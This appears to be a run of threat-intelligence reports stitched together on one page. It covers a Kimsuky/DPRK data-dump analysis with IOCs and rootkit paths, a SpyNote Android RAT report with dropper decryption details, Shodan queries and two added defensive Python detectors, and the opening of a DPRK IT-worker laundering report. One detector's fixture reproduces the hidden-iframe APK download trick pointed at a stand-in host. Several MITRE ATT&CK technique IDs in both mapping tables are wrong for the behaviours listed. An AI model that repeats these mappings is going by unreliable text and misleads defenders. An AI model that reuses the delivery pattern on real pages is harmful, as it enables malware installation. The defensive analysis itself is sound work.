| Accounts | svradmin, oracle, app_adm01, unwadm, shkim88, jaejung91 |
| Domains | tw.systexcloud[.]com, nid-security[.]com, spo.go[.]kr, caa.org[.]tw/.git/ |

Indicators of Compromise (IOCs)

Domains

  • Phishing: nid-security[.]com, html-load[.]com, wuzak[.]com, koala-app[.]com, webcloud-notice[.]com
  • Spoofed portals: dcc.mil[.]kr, spo.go[.]kr, mofa.go[.]kr
  • Pastebin raw links: Used for payload staging and malware delivery

IP Addresses

  • External Targets (Taiwan):
    • 163.29.3[.]119     National Center for High-performance Computing
    • 118.163.30[.]45   Taiwanese government subnet
    • 59.125.159[.]81   Chunghwa Telecom
  • Brute Forcing / Infrastructure Origins:
    • 23.95.213[.]210   VPS provider with malicious history
    • 218.92.0[.]210     China Unicom
    • 122.114.233[.]77  Henan Mobile, PRC

Internal Host IPs (Operator Environment)

  • 192.168.130[.]117
  • 192.168.150[.]117
  • 192.168.0[.]39

Operator Environment: Internal Host IP Narrative

The presence of internal IP addresses such as 192.168.130[.]117, 192.168.150[.]117, and 192.168.0[.]39 within the dump offers valuable insight into the attacker’s local infrastructure, an often-overlooked element in threat intelligence analysis. These addresses fall within private, non-routable RFC1918 address space, commonly assigned by commercial off-the-shelf (COTS) routers and small office/home office (SOHO) network gear.

The use of the 192.168.0[.]0/16 subnet, particularly 192.168.0.x and 192.168.150.x, strongly suggests that the actor was operating from a residential or low-profile environment, not a formal nation-state facility or hardened infrastructure. This supports existing assessments that North Korean operators, particularly those affiliated with Kimsuky, often work remotely from locations in third countries such as China or Southeast Asia, where they can maintain inconspicuous, low-cost setups while accessing global infrastructure.

Moreover, the distinction between multiple internal subnets (130.x, 150.x, and 0.x) may indicate segmentation of test environments or multiple virtual machines running within a single NATed network. This aligns with the forensic evidence of iterative development and testing workflows seen in the .bash_history files, where malware stagers, rootkits, and API obfuscation utilities were compiled, cleaned, and rerun repeatedly.

Together, these IPs reveal an operator likely working from a clandestine, residential base of operations, with modest hardware and commercial-grade routers. This operational setup is consistent with known DPRK remote IT workers and cyber operators who avoid attribution by blending into civilian infrastructure. It also suggests the attacker may be physically located outside of North Korea, possibly embedded in a friendly or complicit environment, strengthening the case for China-based activity by DPRK nationals.

MITRE ATT&CK Mapping

| Phase | Technique(s) |
|---|---|
| Initial Access | T1566.002, Adversary-in-the-Middle (AiTM) Phishing |
| Execution | T1059.005, Native API Shellcode; T1059.003, Bash/Shell Scripts |
| Credential Access | T1555, Credential Store Dumping; T1557.003, Session Hijacking |
| Persistence | T1176, Rootkit (via khook syscall manipulation) |
| Defense Evasion | T1562.001, Disable Security Tools; T1552, Unsecured Credential Files |
| Discovery | T1592, Technical Information Discovery; T1590, Network Information |
| Exfiltration | T1041, Exfiltration over C2 Channel; T1567.002, Exfil via Cloud Services |

Tooling and Capabilities

The actor’s toolkit spans multiple disciplines, blending malware development, system reconnaissance, phishing, and proxy evasion:

  • NASM-based shellcode loaders: Compiled manually for Windows execution.
  • Win32 API hashing: Obfuscated imports via hashstring.py to evade detection.
  • GitHub/Gitee abuse: Tooling hosted or cloned from public developer platforms.
  • OCR exploitation: Used ocrmypdf to parse Korean PDF specs related to digital certificates and VPN appliances.
  • Rootkit deployment: Hidden persistence paths including /usr/lib64/tracker-fs and /proc/acpi/pcicard.
  • Proxy config extraction: Investigated PAC URLs using proxyres-based recon.

Attribution Confidence Assessment

| Attribution Candidate | Confidence Level |
|---|---|
| DPRK-aligned (Kimsuky) | High: native Korean targeting, GPKI focus, OCR behavior |
| China-blended infrastructure | Moderate: PRC hosting, Gitee usage, Taiwan focus |
| Solely PRC actor | Low-to-Moderate: tooling overlap but weak linguistic match |

Assessment: The actor appears to be a DPRK-based APT operator working from within or in partnership with Chinese infrastructure, representing a hybrid attribution model.

Defensive Recommendations

| Area | Recommendation |
|---|---|
| PKI Security | Monitor usage of .key, .sig, .crt artifacts; enforce HSM or 2FA for key use |
| Phishing Defense | Block domains identified in IoCs; validate TLS fingerprints and referrer headers |
| Endpoint Hardening | Detect use of nasm, make, and OCR tools; monitor /usr/lib*/tracker-* paths |
| Network Telemetry | Alert on .git/ directory access from external IPs; monitor outbound to Pastebin/GitHub |
| Taiwan Focus | Establish watchlists for .tw domains targeted by PRC-originating IPs |
| Admin Accounts | Review usage logs for svradmin, oracle, app_adm01, and ensure rotation policies |
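The .git/ access alerting recommended above (and the repository enumeration described in the Taiwan targeting section) as an added example that is not part of the original report: it parses web server access log lines in Combined Log Format, keeps only requests for Git metadata paths from addresses outside RFC1918, loopback and link-local space, and rates each source by whether the server actually served the files. Every IP, host and log line below is constructed for the demonstration.

```python
"""Alert on /.git/ path requests from external source addresses.

Added example, not code from the original report: it applies the report's
'alert on .git/ directory access from external IPs' recommendation to
Combined Log Format web server lines. All IPs, hosts and log lines below are
constructed for the demonstration.
"""
import ipaddress
import re
from collections import defaultdict

# Combined Log Format: ip ident user [time] "METHOD path PROTO" status size "ref" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Any path component named .git (covers /.git/, /app/.git/config, /.git).
GIT_PROBE_RE = re.compile(r'(^|/)\.git(/|$)', re.IGNORECASE)

# Files read first when a repository is exposed; a 200 on any of these means
# the repository metadata really is reachable from outside.
HIGH_VALUE = {"config", "HEAD", "index", "packed-refs", "ORIG_HEAD", "logs/HEAD"}

# Address space treated as internal: RFC1918, loopback and link-local.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def is_external(ip_text):
    """True when the address is neither RFC1918, loopback nor link-local."""
    try:
        ip = ipaddress.ip_address(ip_text)
    except ValueError:
        return False  # malformed source field: do not attribute, do not alert
    if ip.is_loopback or ip.is_link_local:
        return False
    return not any(ip in net for net in INTERNAL_NETS)


def parse_line(line):
    """Return the fields of one access log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def find_git_probes(lines):
    """Group /.git/ requests from external IPs by source address.

    Each finding lists every probed path, the subset the server answered with
    HTTP 200, and whether a high-value file (config, HEAD, ...) was served.
    """
    findings = defaultdict(lambda: {"paths": [], "served": [], "high_value_hit": False})
    for line in lines:
        rec = parse_line(line)
        if rec is None or not GIT_PROBE_RE.search(rec["path"]):
            continue
        if not is_external(rec["ip"]):
            continue  # developers fetching over the LAN are not this alert's concern
        entry = findings[rec["ip"]]
        entry["paths"].append(rec["path"])
        if rec["status"] == "200":
            entry["served"].append(rec["path"])
            # Strip the query string and keep only the part under /.git/.
            tail = rec["path"].split("/.git/", 1)[-1].split("?", 1)[0]
            if tail in HIGH_VALUE:
                entry["high_value_hit"] = True
    return dict(findings)


def severity(finding):
    """'exposed' if high-value metadata was served to an outsider, 'served' if
    only other files were, otherwise 'probe' (every request was refused)."""
    if finding["high_value_hit"]:
        return "exposed"
    return "served" if finding["served"] else "probe"


# Constructed sample: one external scanner that succeeds, one internal
# developer (ignored), one external client whose probe is refused.
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Feb/2025:10:01:02 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "curl/8.0"',
    '203.0.113.7 - - [20/Feb/2025:10:01:03 +0800] "GET /.git/config HTTP/1.1" 200 312 "-" "curl/8.0"',
    '203.0.113.7 - - [20/Feb/2025:10:01:04 +0800] "GET /.git/index HTTP/1.1" 403 0 "-" "curl/8.0"',
    '192.168.1.20 - - [20/Feb/2025:10:05:00 +0800] "GET /.git/HEAD HTTP/1.1" 200 23 "-" "git/2.43"',
    '198.51.100.9 - - [20/Feb/2025:10:06:00 +0800] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Feb/2025:10:06:01 +0800] "GET /.git/ HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, f in sorted(find_git_probes(SAMPLE_LOG).items()):
        print(f"{ip}: {severity(f)} ({len(f['paths'])} requests, {len(f['served'])} served)")
```

An "exposed" finding means the fix is on the server side (deny access to .git/ and rotate any secrets in the history), not only a blocklist entry for the source address.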

APPENDIX A

Overlap or Confusion with Chinese Threat Actors

There is notable evidence of operational blur between Kimsuky and Chinese APTs in the context of Taiwan. The 2025 “Kim” data breach revealed an attacker targeting Taiwan whose tools and phishing kits matched Kimsuky’s, yet whose personal indicators (language, browsing habits) suggested a Chinese national. Researchers concluded this actor was likely a Chinese hacker either mimicking Kimsuky tactics or collaborating with them. In fact, the leaked files on DDoS Secrets hint that Kimsuky has “openly cooperated with other Chinese APTs and shared their tools and techniques”. This overlap can cause attribution confusion: a Taiwan-focused operation might initially be blamed on China but could involve Kimsuky elements, or vice versa. So far, the consensus is that North Korean and Chinese cyber operations remain separate, but cases like “Kim” show how a DPRK-aligned actor can operate against Taiwan using TTPs common to Chinese groups, muddying the waters of attribution.

File List from dump:

Master Evidence Inventory:

| File Name | Language | Content Summary | Category | Relevance |
|---|---|---|---|---|
| .bash_history | Mixed (EN/KR) | Operator shell history commands | System/Log | Shows rootkit compilation, file ops, network tests |
| user-bash_history | Mixed (EN/KR) | User-level shell commands | System/Log | Development and test activity |
| root-bash_history | Mixed (EN/KR) | Root-level shell commands | System/Log | Privilege-level activity, implant deployment |
| auth.log.2 | EN/KR | Authentication logs (PAM/SSH) | System/Log | Credential changes marked 변경완료, brute force IPs |
| 20190315.log | EN | System log file | System/Log | Auth and system access events |
| chrome-timeline.txt | EN | Browser activity timeline | Browser | Visited domains extraction |
| chromehistory.txt | EN | Browser history export | Browser | URLs visited |
| history.sqlite | EN | Empty DB file | Browser | No useful data |
| Media History | EN | Empty SQLite DB | Browser | No playback activity |
| History | EN | Empty Brave/Chromium DB | Browser | No visited URLs |
| Web Data | EN | Autofill/search DB | Browser | Search engines used (Google, DuckDuckGo, Qwant, Startpage, Ecosia) |
| Visited Links | Binary | LevelDB/binary structure | Browser | Could not extract URLs |
| Cookies | EN | SQLite DB with cookies | Browser | Google cookies found |
| request_log.txt.20250220 | EN | Captured phishing session | Phishing | Spoofed spo.go.kr, base64 credential logging |
| 技术说明书 - 22.docx | ZH | Chinese rootkit stealth manual | Rootkit | Kernel hiding, binary embedding |
| 1.ko 图文编译 .doc | ZH | Chinese compilation guide | Rootkit | Rootkit build process |
| 1. build ko .txt | ZH | Build notes | Rootkit | Implant compilation instructions |
| 0. 使用.txt | ZH | Usage notes | Rootkit | Implant usage and commands |
| re 正向工具修改建议 1.0.txt | ZH | Modification notes | Rootkit | Reverse tool modification suggestions |
| 1111.txt | ZH | Rootkit/tool snippet | Rootkit | Part of implant notes |
| client | Binary | Rootkit client binary | Rootkit | Controller for implant communication |
| SSA_AO_AD_WT_002_웹보안 프로토콜설계서_Ver1.0_.doc | KR | GPKI protocol design doc | PKI | Korean web PKI standards |
| 행자부 웹보안API 인수인계.doc | KR | GPKI API deployment manual | PKI | Deployment and cert API internals |
| HIRA-IR-T02_의약품처방조제_ComLibrary_통신전문.doc | KR | Medical ComLibrary XML spec | Healthcare | Prescription system communication |
| (별지2)행정전자서명_기술요건_141125.pdf | KR | PKI requirements PDF | PKI | OCR target |
| SecuwaySSL U_카달로그.pdf | KR | VPN catalog | PKI/VPN | OCR target |
| phrack-apt-down-the-north-korea-files.pdf | EN | Phrack article | Reference | Background on Kimsuky dump |
| Muddled Libra Threat Assessment.pdf | EN | Threat intel report | Reference | Comparative threat actor study |
| Leaked North Korean Linux Stealth Rootkit Analysis.pdf | EN | Rootkit analysis | Reference | Detailed implant study |
| Inside the Kimsuky Leak.docx (various) | EN | Threat report drafts | Report | Working versions |
| account (2).txt | EN | DB export (DBsafer, TrustedOrange) | Infra | Accounts and DB changes |
| result.txt | KR | Cert-related parsed data | Infra | Included GPKI .key/.sig |
| english_wikipedia.txt | EN | Wikipedia dump | Reference | Unrelated baseline |
| bookmarks-2021-01-04.jsonlz4 | EN | Firefox bookmarks (compressed) | Browser | Needs decompression |
| Screenshot translations | ZH | Chinese text (rootkit marketing blurb) | Rootkit | Kernel hiding tool description |
SpyNote Malware Part 2

This report highlights the resurfacing of SpyNote activity by the same actor in a previous DTI report and provides additional information around the recent activity and changes in tactics since the prior report.

Deceptive websites are mimicking popular Android application install pages on the Google Play Store to lure victims into downloading AndroidOS SpyNote malware, a potent Android RAT used for surveillance, data exfiltration, and remote control. This report highlights the resurfacing of SpyNote activity by the same actor in the previous DTI report in April and provides additional information around the recent activity and changes in tactics since the prior report. Notably, the actor made minor changes in IP resolutions and added additional anti-analysis in the APK dropper in an attempt to protect the SpyNote payload from detection.

Details

SpyNote is a highly intrusive Android Remote Access Trojan (RAT) with extensive capabilities for surveillance, data exfiltration, and device manipulation. It can remotely control a device’s camera and microphone, manage phone calls, and execute commands. Of particular concern is its keylogging functionality, which targets application credentials and abuses Android’s Accessibility Services to steal two-factor authentication (2FA) codes. Beyond data theft, SpyNote can also perform on-device actions like displaying overlay attacks for clickjacking. If granted administrator privileges, it gains the power to remotely wipe data, lock the device, or install additional malicious applications, making it a formidable threat for espionage and cybercrime.

The pages shown below are static clones, using HTML and CSS copied from the actual Google Play Store to appear legitimate. Their primary purpose is to trick users into downloading and installing an Android application package (.apk file). The “Install” button triggers a JavaScript function to download an .apk file directly from the malicious website.

Delivery Domain Registration and Website Patterns

Registrar

  • NameSilo, LLC
  • XinNet Technology Corporation

IP ISP:

  • Lightnode Limited
  • Vultr Holdings LLC

SSL Issuer:

  • R10
  • R11

Nameserver

  • dnsowl[.]com
  • xincache[.]com

Server Type:

  • nginx

Prominent IP Resolved:

  • 154.90.58[.]26
  • 199.247.6[.]61

Frequent HTML Code Inclusions

  • https[:]//unpkg[.]com/current-device@0.10.2/umd/current-device.min.js
  • “sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE”
  • “PJKdyVFC5jlu_l8Wo_hirJkhs1cmitmn44fgpOc3zFc”

Malware Delivery Website Review

The download() function is the core of the page’s malicious functionality.

It creates a hidden iframe and sets its source to a JavaScript URI that triggers a navigation to Chrome.apk. This is a common technique to initiate a file download from the browser without the user leaving the current page.

Malware Execution

1. Initial Dropper Decrypts Payload: The first APK reads encrypted assets, generates a key from its manifest, and decrypts the second-stage SpyNote payload.

The malware employs a dynamic payload technique to conceal its primary functions, loading them from a separate file only after the application is installed and running. This is achieved using a code injection method known as DEX Element Injection. The malware uses reflection to access and modify the app’s core ClassLoader at runtime, inserting its own malicious code elements at the very beginning of the code lookup path. This forces the Android system to prioritize and execute the malicious code over the app’s legitimate code, enabling it to bypass static security analysis and hijack application functions to intercept data.

The AndroidManifest file is protected and contains details needed to retrieve the AES decryption key from the Chrome.apk. In this case, the package name “rogcysibz.wbnyvkrn.sstjjs” is needed to retrieve the 16-byte AES key “62646632363164386461323836333631”.

Chrome.apk (Dropper)
48aa5f908fa612dcb38acf4005de72b9379f50c7e1bc43a4e64ce274bb7566e8

Classes.dex (SpyNote)
86e8d3716318e9bb63b86aebe185db5db6718cb3ddea7fbafefa8ebfb674b9e8

Decrypted 000 + 001 (SpyNote and its assets/base dex file containing its C2 configurations)
b81febd19a457e6814d7e28d68742ae25fc4cf6472289a481e262048e9d8eee4
703d62470d31866ccecb66f0083084c478e9e92916041216ec8d839afed0d0d6

Within the assets/base/ folder there are two files: 000 and 001. The dropper works by concatenating the 000 and 001 files (combined_assets), decrypting the combined data with the AES key, and then gzip-decompressing the result. The output is the SpyNote APK, which the dropper then loads. This happens once the user installs the dropper, runs it, and taps a prompt on the app’s load screen. The decrypted file is a second APK that contains the main SpyNote functionality and the configuration details for the command-and-control (C2) server.

2. SpyNote Payload Loads C2 Logic: The main SpyNote APK dynamically loads another DEX file from its own `assets/base` folder. This DEX file contains the actual C2 connection logic.

3. C2 Logic Establishes Connection: The dynamically loaded DEX file contains the code to build the WebSocket URL for the C2 server.

In previously reported configurations, the C2s were hardcoded directly in the functions for sending traffic. In recent samples, they use control flow obfuscation and identifier obfuscation through random variations of o, O, and 0 for all names in an attempt to make it difficult to understand the program’s logic through static analysis.

Sample identifier obfuscation in a loaded DEX file:

4. C2 Domain Selection Logic: A utility method selects a domain from a predefined list, making the malware more resilient.

5. Hardcoded C2 Domain List: The final destination is a simple class that acts as a container for the hardcoded C2 domains.

Threat Actor Analysis

The threat actor distributing SpyNote malware exhibits persistence and limited technical adaptability. They consistently use deceptive Google Play Store clones to lure victims, a social engineering tactic that remains central to their operations. Despite previous exposure, their infrastructure remains confined to two primary IP addresses, showing a restricted capacity for diversification, though they do rotate specific IP resolutions. The anti-analysis techniques used in their APK droppers are relatively simple, employing basic obfuscation and dynamic payload decryption to protect the SpyNote payload.

The APK filenames suggest the spoofed brands or applications fall into these categories:

  • Social & Dating Apps: iHappy, CamSoda, Kismia, yome, TmmTmm
  • Gaming Apps: 8 Ball Pool, Block Blast
  • General Utility/Productivity Apps: Chrome, meus arquivos 2025, Beauty, Faísca Inicial, Compras Online, LoveVideo, GlamLive, Holding Hands

This actor is suspected of broadly targeting consumers with lures mimicking popular applications, including those related to fashion, social networking, and general utilities, as well as ubiquitous apps like Chrome and Zoom. This wide net, coupled with the surveillance and data exfiltration capabilities of SpyNote, strongly suggests a financially motivated objective. While the delivery code contains Chinese language comments, the specific attribution for this persistent and opportunistic threat actor remains unknown.

Conclusion

This report details a persistent SpyNote malware campaign by an actor relying on deceptive Google Play Store clones for delivery. Key technique changes were the dynamic payload decryption and DEX element injection used by the initial dropper, which conceals SpyNote’s core functions and hijacks app behavior, and the control flow and identifier obfuscation applied to the C2 logic to hinder static analysis. The actor’s limited infrastructure adaptability and broad consumer targeting for financial gain highlight their opportunistic yet effective approach. This persistent activity underscores the ongoing threat of mobile RATs and the need for continuous vigilance against social engineering tactics, even from actors with limited technical sophistication.

Security Recommendations

To better protect consumers from threats like SpyNote, key players in the security ecosystem can enhance their defenses:

Browser Developers: Consider strengthening built-in malicious site warnings to automatically flag and block access to deceptive download pages such as fake Google Play Store sites. This helps users avoid suspicious sites entirely.

Android Antivirus Providers and Mobile OS Developers: Focus on advancing automated analysis of app downloads to quickly detect and prevent the installation of harmful software, even when it tries to hide. This provides a crucial layer of defense directly on the device.

Mobile VPN Providers: Explore integrating network-level security features that automatically filter out or alert to connections to known malicious servers. This adds another protective barrier, stopping threats before they can reach the user’s device.

IOCs

Malware Delivery


Droppers


SpyNote


Command & Control


Shodan Hunting Queries

Tip: Look for fake Google Play Store sites or suspicious iframe JavaScript sources for file downloads.

http.html:"jscontroller=\"pjICDe\"" http.html:"jsaction=\"rcuQ6b:npT2md;\""
http.html:"sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE" OR http.html:"PJKdyVFC5jlu_l8Wo_hirJkhs1cmitmn44fgpOc3zFc"
http.html:"VfPpkd-jY41G-V67aGc"
http.html:"iframe.src = \"javascript: '<script>location.href=\\\""
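The hidden-iframe download trick from the delivery website review and the static markers the hunting queries above key on, as an added example that is not part of the original report: a small page-triage function that flags the javascript: iframe navigation to an .apk, extracts the download URL, and reports which copied Play Store markers are present. SAMPLE_HTML is constructed to mimic the described pattern (the host example.invalid cannot resolve); it is not a copy of any real delivery page.

```python
"""Triage page HTML for the fake Play Store / hidden-iframe APK delivery pattern.

Added example, not code from the original report: it checks a page for the
javascript: iframe download trick described above and for the static markers
the Shodan queries key on, and extracts the .apk URL. SAMPLE_HTML is
constructed to mimic the described pattern; it is not a real delivery page.
"""
import re

# Static markers copied from real Play Store markup (from the hunting queries).
STATIC_MARKERS = (
    'jscontroller="pjICDe"',
    'jsaction="rcuQ6b:npT2md;"',
    "sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE",
    "PJKdyVFC5jlu_l8Wo_hirJkhs1cmitmn44fgpOc3zFc",
    "VfPpkd-jY41G-V67aGc",
)

# iframe.src = "javascript: '<script>location.href=\"https://.../x.apk\"</script>'"
IFRAME_JS_RE = re.compile(
    r'''iframe\.src\s*=\s*["']javascript:\s*'?<script>location\.href=\\?["'](?P<url>[^"'\\]+)''',
    re.IGNORECASE,
)
# iframe.style.display = 'none'  (the frame is never meant to be seen)
HIDDEN_IFRAME_RE = re.compile(r'''iframe[^;]*?\.style\.display\s*=\s*["']none["']''', re.IGNORECASE)
# Any absolute URL ending in .apk anywhere in the page.
APK_RE = re.compile(r'''https?://[^\s"'<>\\]+\.apk''', re.IGNORECASE)


def triage_page(page_html):
    """Return a verdict plus the evidence behind it.

    The javascript: iframe navigation to an .apk is treated as decisive; copied
    Play Store markup on its own only raises suspicion, since a legitimate
    mirror or cached copy can contain the same attributes.
    """
    markers = [m for m in STATIC_MARKERS if m in page_html]
    js_targets = [m.group("url") for m in IFRAME_JS_RE.finditer(page_html)]
    apk_urls = sorted(set(APK_RE.findall(page_html)))
    hidden_iframe = HIDDEN_IFRAME_RE.search(page_html) is not None
    if js_targets:
        verdict = "malicious"
    elif apk_urls and (markers or hidden_iframe):
        verdict = "suspicious"
    else:
        verdict = "clean"
    return {
        "verdict": verdict,
        "markers": markers,
        "hidden_iframe": hidden_iframe,
        "javascript_uri_targets": js_targets,
        "apk_urls": apk_urls,
    }


# Constructed sample page; the marker placement is illustrative only.
SAMPLE_HTML = r'''<html><body>
<meta name="build" content="sBw2N8uateIzRr93vmFze5MF_35vMk5F1wG04L5JcJE">
<meta name="build2" content="PJKdyVFC5jlu_l8Wo_hirJkhs1cmitmn44fgpOc3zFc">
<div jscontroller="pjICDe" jsaction="rcuQ6b:npT2md;"></div>
<button class="VfPpkd-jY41G-V67aGc" onclick="download()">Install</button>
<script>
function download() {
  var iframe = document.createElement('iframe');
  iframe.style.display = 'none';
  iframe.src = "javascript: '<script>location.href=\"https://example.invalid/Chrome.apk\"<\/script>'";
  document.body.appendChild(iframe);
}
</script>
</body></html>'''

BENIGN_HTML = '<html><body><a href="https://example.invalid/docs">Docs</a></body></html>'

if __name__ == "__main__":
    for name, page in (("sample", SAMPLE_HTML), ("benign", BENIGN_HTML)):
        print(name, triage_page(page))
```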

SpyNote Mobile ATT&CK Matrix

| Capability | MITRE ATT&CK Mobile Technique | Technique ID |
|---|---|---|
| Stealing SMS messages | Collect SMS Messages | T1636.004 |
| Accessing and exfiltrating contact list | Contact List | T1636.003 |
| Reading call logs | Call Log | T1636.002 |
| Tracking GPS location | Location Tracking | T1430 |
| Accessing and potentially stealing files from external storage | Data from Local System | T1533 |
| Extracting device information (IMEI, system specs) | Device Information Discovery | T1640 |
| Monitoring network traffic | Network Traffic Monitoring | T1657 |
| Stealing photos | Data from Local System | T1533 |
| Activating the device's camera to capture photos or videos | Camera Capture | T1428 |
| Recording audio from the device's microphone | Audio Capture | T1429 |
| Making phone calls | Make Phone Call | T1646 |
| Intercepting incoming phone calls and recording them | Call Recording | T1645 |
| Providing a shell terminal for remote command execution | External Remote Services | T1132 |
| Keylogging (recording keystrokes) | Input Capture | T1478 |
| Targeting credentials for various applications (banking, social media) | Credentials in Files | T1555.004 |
| Extracting two-factor authentication (2FA) codes | Credentials in Files | T1555.004 |
| Displaying content over other applications (clickjacking) | Overlay Windows | T1641 |
| Remotely wiping data | Data Destruction | T1485 |
| Remotely locking the device | Device Lockout | T1486 |
| Remotely resetting the device password | Reset Device Password | T1535 |
| Downloading and installing new applications without user consent | Install Other Software | T1534 |
| Self-updating | Update Software | T1539 |
| Deleting collected data from the SD card | File Deletion | T1574 |
| Detecting other installed applications | Installed Application List | T1518 |
| Capturing screen content | Screen Capture | T1656 |
| Targeting cryptocurrency accounts (stealing private keys, wallet info) | Credentials in Files | T1555.004 |
| Injecting web links into web view modules within applications | Webview Injection | T1556 |
| Hiding its application icon from the app launcher | Hide Icons | T1668 |
| Automatically starting malicious services after device reboot | Event Triggered Execution: Broadcast Receivers | T1624.001 |
| Implementing "diehard services" that are difficult to shut down | Persistence via System Application | T1520 |
| Excluding itself from battery optimization settings | Disable or Modify System Configuration: Disable Battery Optimization | T1546.003 |
| Displaying continuous silent notifications to maintain a persistent presence | Abuse of OS Features: Notifications | T1529 |
| Monitoring system settings for attempts to remove the application and blocking them | Prevent Application Uninstall | T1547 |
| Hijacking accessibility services to simulate user inputs to prevent uninstallation | Abuse of Accessibility Features | T1550 |
| Automatically navigating back to the device's home screen when a user tries to access app settings | Application Manipulation | T1701 |

Reference: https://attack.mitre.org/matrices/mobile/

From Laptops to Laundromats: How DPRK IT Workers Infiltrated the Global Remote Economy

This report maps the entire ecosystem of a DPRK IT worker infiltration scheme: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.

Introduction

Over the last five years, the Democratic People’s Republic of Korea (DPRK) has transitioned from smash-and-grab cryptocurrency raids to a more covert, scalable model of economic warfare: the global deployment of disguised IT workers.

Orchestrated by elite units under the Reconnaissance General Bureau (RGB), these operatives acquire remote employment with U.S. and international tech firms using forged or stolen identities. Once embedded, they receive crypto-based salaries and redirect those earnings into the DPRK’s economy via a network of laundering nodes, front companies, and domain infrastructure.

This report maps the entire ecosystem: key actors, GitHub aliases, laundering flows, shell companies, fake domains, platform infiltration, wallet infrastructure, and global enablers. We also examine the national security implications of the scheme, as well as how lax corporate hiring standards allowed North Korean operatives not just to get paid, but to access critical infrastructure, intellectual property, and production code.

Key Actors and Their Roles

Central Command: Song Kum Hyok & the Andariel Subgroup

At the operational core of North Korea’s disguised IT labor campaign stands Song Kum Hyok, a senior officer within the Andariel subgroup, one of the Reconnaissance General Bureau’s (RGB) elite cyber units. The RGB, North Korea’s main foreign intelligence service, directs both offensive cyber operations and covert economic warfare efforts, and Song’s role straddles both.

Hyok has long been involved in digital identity manipulation, remote access infrastructure, and dark market employment pipelines. Intelligence archives suggest that before assuming his current role, he was linked to multiple Andariel operations involving ransomware staging servers and social engineering against South Korean financial firms.

In the IT worker scheme, Song Kum Hyok is the strategic coordinator of identity theft and resume forgery, enabling North Korean engineers to present themselves as legitimate U.S.-based freelancers. North Korea’s decentralized cyber-labor offensive hinges on stolen and curated identities—complete with names like Joshua Palmer, Sandy Nguyen, and GitHub handles such as devmad119 and sujitb2114. These identities often include verified Know Your Customer (KYC) data: Social Security numbers, clean background checks, and even Green Card scans, sourced from data breaches or underground markets.

Operatives use these identity packages to craft professional-grade resumes and LinkedIn profiles, frequently enhanced with AI-generated content and real or fabricated employment histories. They apply to remote jobs on freelancing platforms such as Upwork, Ureed, or the now-defunct Nabbesh, exploiting weak or automated verification and HR onboarding systems in U.S. companies.

Once hired, they gain access to internal tools and sensitive systems: GitHub repositories, Slack channels, financial dashboards, CI/CD pipelines, and privileged cloud infrastructure. From this vantage point, they can siphon intellectual property, embed backdoors, and surveil company operations, all while appearing to be legitimate remote hires. This seamless path, from stolen identity to embedded insider, is the operational backbone of Pyongyang’s covert cyber-espionage labor force.

Once North Korean operatives are embedded in foreign companies, their wages, often paid in cryptocurrency as well as by bank transfer, are routed through a meticulously layered laundering process. The first stop is typically a GitHub-linked wallet address associated with the operative’s fake identity (e.g., aliases like “devmad119” or “Joshua Palmer”). From there, the funds may flow into front companies such as Hopana-Tech LLC which act as legitimate salary processors. To further obscure the money trail, salaries are split across multiple wallets using automated smart contracts, a tactic designed to fragment and anonymize the source of funds. Finally, the dispersed assets are aggregated and cashed out via over-the-counter (OTC) crypto brokers based in Russia, the UAE, and China, jurisdictions known for permissive financial enforcement. This end-to-end pipeline creates a resilient and stealthy mechanism for the DPRK to funnel hard currency back into its economy while bypassing international sanctions.

Crypto transfers and laundering
Banking transfers

Hyok’s innovation lies in combining AI-generated job profiles with pre-cleared identity data and military operational discipline. Under his supervision, the scheme has moved from ad hoc fraud to a scalable, persistent economic attack model yielding millions of dollars annually for North Korea’s weapons programs while hiding in plain sight inside the legitimate global economy.

U.S. Frontman: Kejia Wang

From a quiet address in Edison, New Jersey, Kejia Wang, also known as Tony Wang, ran one of the most critical nodes in North Korea’s international cyber-laundering apparatus. His residence at 65 Idlewild Road wasn’t just a suburban home; it was the physical anchor for a web of front companies, remote device hubs, and disguised income laundering pipelines that allowed DPRK IT workers to embed themselves inside U.S. companies.

Wang operated under the radar, founding multiple businesses that appeared legitimate on paper but functioned primarily as pass-through entities for laundering salaries earned under false identities. These businesses included tech fronts, aviation firms, and even a massage parlor, each playing a role in the deception.

The most visible of these fronts was the Highland Park 215 Spa, located just a few miles from Wang’s listed residence. Officially a wellness spa, it appears to have functioned as a cash-out hub for crypto proceeds tied to North Korean developers. Its web presence was thin and reviews inconsistent, offering more red flags than relaxation.

Wang’s activities extended far beyond shell paperwork. He physically received laptops sent by U.S. companies hiring remote workers and connected them to internet-facing KVM switches. These switches allowed DPRK operatives, posing under names like “Joshua Palmer” or GitHub aliases like “devmad119”, to work as though they were based in the U.S. He also installed unauthorized software, managed credentials, and monitored access on behalf of the regime.

To keep the deception watertight, Wang opened corporate bank accounts, created digital presences for the fake companies, and maintained financial rails through platforms like Wise, Zelle, and Payoneer. His shell entities even issued IRS tax forms using stolen identity data, giving employers the impression that their freelance hires were tax-compliant U.S. residents.

Wang coordinated with a global network of co-conspirators, including Zhenxing Wang and Jing Bin Huang in China, Mengting Liu in Taiwan, and crypto brokers in the UAE and Russia. These connections formed the infrastructure that allowed funds from unsuspecting U.S. firms, including those in the defense sector, to end up in wallets controlled by the North Korean regime.

Court filings in DOJ case 25-cr-10274 paint a damning picture: Kejia Wang was not only aware that the workers were North Korean nationals, but also actively facilitated the laundering of more than $5 million in wages tied to fraud, of which at least $3 million resulted in direct corporate losses.

